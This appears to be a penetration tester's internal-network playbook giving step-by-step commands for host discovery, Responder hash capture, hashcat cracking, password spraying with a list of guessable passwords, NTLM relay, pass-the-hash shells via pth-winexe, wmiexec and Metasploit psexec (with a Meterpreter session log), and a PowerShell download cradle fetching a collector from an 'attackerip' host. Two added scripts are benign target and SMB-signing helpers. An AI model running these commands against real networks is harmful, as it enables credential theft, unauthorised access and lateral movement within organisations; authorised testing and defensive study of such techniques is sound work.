Internal Network

Host Discovery

Nmap ping scan the private ranges and start Responder (Responder takes the interface with -I):

responder -I eth0
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
#netdiscover
netdiscover -i eth0 -P
#NBTScan
nbtscan 192.168.1.0/24

Now extract the IP addresses from Targets.tmp (cat, grep them out, sort -u) into a file called Targets.txt; every scan below reads from that file.
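One way to do that consolidation step, as an added example that is not from the original notes: it pulls every IPv4 address out of the mixed nmap -sn / masscan / Responder output in Targets.tmp, drops the tester's own address (assumed to be passed in; see the ifconfig step above) and anything outside RFC 1918 space, and writes a sorted, de-duplicated Targets.txt. The sample Targets.tmp is constructed.

```shell
#!/bin/bash
# Added example (not from the original notes): turn the mixed Targets.tmp that the
# nmap -sn, masscan and Responder commands above append to into a clean Targets.txt.
# Assumptions: only RFC 1918 addresses are in scope and the tester's own address is
# passed in so it is excluded. The sample input below is constructed.

IPV4_RE='([0-9]{1,3}\.){3}[0-9]{1,3}'

# is_private_ip <ip>: true for 10/8, 172.16/12 and 192.168/16
is_private_ip() {
    case "$1" in
        10.*|192.168.*) return 0 ;;
        172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
        *) return 1 ;;
    esac
}

# consolidate_targets <input> <output> [own-ip]
# Extracts every IPv4 address from the mixed tool output, drops the tester's own
# address and non-private ranges, sorts numerically by octet and de-duplicates.
# Prints the number of targets written.
consolidate_targets() {
    local src="$1" dst="$2" own="${3:-}"
    grep -oE "$IPV4_RE" "$src" \
      | while IFS= read -r ip; do
            [ "$ip" = "$own" ] && continue
            is_private_ip "$ip" && printf '%s\n' "$ip"
        done \
      | sort -u -t. -k1,1n -k2,2n -k3,3n -k4,4n > "$dst"
    wc -l < "$dst" | tr -d ' '
}

# Constructed sample mixing nmap -sn, masscan and bare Responder-derived lines.
make_sample() {
    cat > "$1" <<'EOF'
Nmap scan report for 10.0.0.20
Host is up (0.00043s latency).
Nmap scan report for 10.0.0.5
Discovered open port 445/tcp on 10.0.0.20
Discovered open port 22/tcp on 192.168.1.7
Discovered open port 80/tcp on 8.8.8.8
10.0.0.5
10.0.0.99
EOF
}

d=$(mktemp -d); make_sample "$d/Targets.tmp"
consolidate_targets "$d/Targets.tmp" "$d/Targets.txt" 10.0.0.99; cat "$d/Targets.txt"; rm -rf "$d"
```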

Nmap Scans

mkdir Scans
nmap -p 21 -n --open -iL Targets.txt -oA Scans/ftp
nmap -p 22 -n --open -iL Targets.txt -oA Scans/ssh
nmap -p 23 -n --open -iL Targets.txt -oA Scans/telnet
nmap -p 80 -n --open -iL Targets.txt -oA Scans/http
nmap -p 443 -n --open -iL Targets.txt -oA Scans/https
nmap -p 445 -n --open -iL Targets.txt -oA Scans/smb
nmap -p 3389 -n --open -iL Targets.txt -oA Scans/rdp
cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt

Scanning

Start Nessus on discovered IP addresses

Run AutoScan.sh against every host in Targets.txt.

If it runs slowly (thousands of hosts), reduce the number of ports it scans.

#!/bin/bash
# AutoScan.sh - run the TCP/UDP nmap, Nikto, sslscan and gobuster scans against every
# host in Targets.txt. Everything is appended to Scanner.log and each tool also writes
# a per-host file named <ip>-NN-<tool>.txt; the second loop summarises the open ports
# into ServicesList.txt.
LOG=Scanner.log
SEP="---------------------------------------------------------------"
WORDLIST=/root/Data/Tools/Wordlists/Dirbuster/Fast.txt

log()    { echo "$@" | tee -a "$LOG"; }
banner() { log "$SEP"; log "$1"; log "$SEP"; }

for Target in $(cat Targets.txt); do
    log "$SEP"
    log "Auto Scanner"
    log "$Target - Scanned: $(date)"
    log "$SEP"
    log ""
    banner "TCP Scan Started: $(date)"
    #Full
    nmap -Pn -sS -sV -sC -O --top-ports 1000 -oN "$Target-01-NmapTCP.txt" "$Target" | tee -a "$LOG"
    #Fast (lower --top-ports when scanning thousands of hosts)
    #nmap -Pn -sS -sV -sC -O --top-ports 1000 -oN "$Target-01-NmapTCP.txt" "$Target" | tee -a "$LOG"
    banner "UDP Scan Started: $(date)"
    #Full
    #nmap -sU -sV -sC --top-ports 200 -oN "$Target-02-NmapUDP.txt" "$Target" | tee -a "$LOG"
    #Fast
    nmap -sU -sV -sC --top-ports 10 -oN "$Target-02-NmapUDP.txt" "$Target" | tee -a "$LOG"
    banner "Nikto Scan Started: $(date)"
    nikto -p 80,443,8000,8080 -h "$Target" | tee "$Target-03-Nikto.txt" | tee -a "$LOG"
    banner "SSL Scan Started: $(date)"
    sslscan --show-certificate --no-colour "$Target" | tee "$Target-04-SSLScan.txt" | tee -a "$LOG"
    banner "Directory Scan Started: $(date)"
    gobuster -u "http://$Target/" -w "$WORDLIST" -q -e -t 10 | tee -a "$Target-05-Directories.txt" | tee -a "$LOG"
    gobuster -k -u "https://$Target/" -w "$WORDLIST" -q -e -t 10 | tee -a "$Target-05-Directories.txt" | tee -a "$LOG"
done

# Collect the open ports from each host's nmap output as "<ip>:<port line>" entries.
for Target in $(cat Targets.txt); do
    {
        grep /tcp "$Target-01-NmapTCP.txt" 2>/dev/null | grep open
        grep /udp "$Target-02-NmapUDP.txt" 2>/dev/null | grep open | grep -v filtered
    } | while IFS= read -r port; do
        echo "$Target:$port" >> ServicesList.txt
    done
done

echo
banner "The following services were found:"
cat ServicesList.txt | tee -a "$LOG"

Check Responder for captured hashes and crack them with hashcat (mode 5600 is NetNTLMv2):

hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules

Once you have some hashes, test them against several wordlists; if none work, scrape the client's website for words with cewl:

cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/

Then repeat the cracking process with a good rule list.

Domain enumeration

Get DC List

# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL Targets.txt --open
for i in $(cat Targets.txt); do nslookup "$i" | grep "dc"; done
nslookup
> set type=all
> _ldap._tcp.dc._msdcs.DOMAIN

Get user list

rpcclient -U "domain\\username" 10.0.0.1   # 10.0.0.1 = the DC
rpcclient $> enumdomusers

Copy list of users to "rpcuserlist.txt" file and sort:

cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.

It may be worth checking the password lockout policy with the client if in a sensitive environment.

msfconsole -q
use auxiliary/scanner/smb/smb_login
set rhosts domaincontrollerip
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date   # prints a timestamp so you know when this round ran
run

When time is up change the password and rerun.

Passwords to try:

Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
Summer@2018

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated:

for i in $(cat Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt

Find open writable shares and search for authenticated file servers:

for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
# Ctrl+F "WRITE" to find the writable shares

EyeWitness

python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off its HTTP and SMB servers (ntlmrelayx.py needs those ports):

[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On

Start responder

python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w

Create a list of targets with SMB signing disabled.

nmap -n -p 137,139,445 --script=smb-security-mode 192.168.1.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
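A more robust way to read the smb-security-mode results, as an added example that is not from the original notes: it parses nmap's normal (-oN) output host by host instead of relying on grep -B 15, and it also flags hosts that merely "support" signing, since a relay is only blocked when signing is required. From the defensive side the second function is the remediation list: the hosts where signing must be enforced. The sample nmap output is constructed.

```shell
#!/bin/bash
# Added example (not from the original notes): parse nmap's normal (-oN) output for
# the smb-security-mode script and report, per host, whether SMB message signing is
# required. Unlike the grep -B 15 one-liner it also flags hosts that only "support"
# signing, because relay is only prevented when signing is required.
# The sample input is constructed.

# smb_signing_report <nmap-normal-output>
# Prints "<host><TAB><message_signing value>" for each host with a script result.
smb_signing_report() {
    awk '
        /^Nmap scan report for/ {
            host = $NF             # bare IP with -n, "(ip)" when a name resolved
            gsub(/[()]/, "", host)
        }
        /message_signing:/ {
            status = $0
            sub(/.*message_signing: */, "", status)
            print host "\t" status
        }
    ' "$1"
}

# smb_signing_not_required <nmap-normal-output>
# Hosts answering "supported" or "disabled" accept unsigned sessions, so these are the
# ones to enforce signing on (GPO "Digitally sign communications (always)").
smb_signing_not_required() {
    smb_signing_report "$1" | awk -F'\t' '$2 !~ /^required/ { print $1 }'
}

# Constructed excerpt of what the nmap command above prints.
make_sample() {
    cat > "$1" <<'EOF'
Nmap scan report for 192.168.1.10
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for dc01.domain.local (192.168.1.20)
| smb-security-mode:
|_  message_signing: required
Nmap scan report for 192.168.1.30
| smb-security-mode:
|_  message_signing: supported
EOF
}

sample=$(mktemp); make_sample "$sample"
echo "Hosts where SMB signing is not required (enforce it on these):"
smb_signing_not_required "$sample"; rm -f "$sample"
```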

Now start ntlmrelayx.py against the targets

python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt

If the relayed account is a high-privilege user, ntlmrelayx will dump the local hashes from that system.

Now use psexec within Metasploit to log in to the target:

msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit

Pass the hash

Once ntlmrelayx.py has dumped the hashes, use them with the pth-* tools, Impacket or xfreerdp. Example session (the relay first, then pass the hash):

Then run

python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@Kali:~# pth-wmis -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
root@Kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 administrator@192.168.1.25
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
root@Kali:~# apt-get update
root@Kali:~# apt-get install freerdp-x11
root@Kali:~# xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit

This will output the local hashes if you capture a domain admin's NTLM hash.

Once you have this hash, log in to the machine with Metasploit's psexec pass-the-hash module or psexec.py.

Bloodhound

Once on the domain as a Windows user, run the following:

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"

Either collector will do. Once the enumeration has finished, copy the CSV files to your attacker machine, make sure BloodHound is installed and then execute:

neo4j console
bloodhound

Visit 127.0.0.1:7687

Enter your password and upload the CSV files you extracted from the target.

Click Queries and then Find Shortest Path to Domain Admin.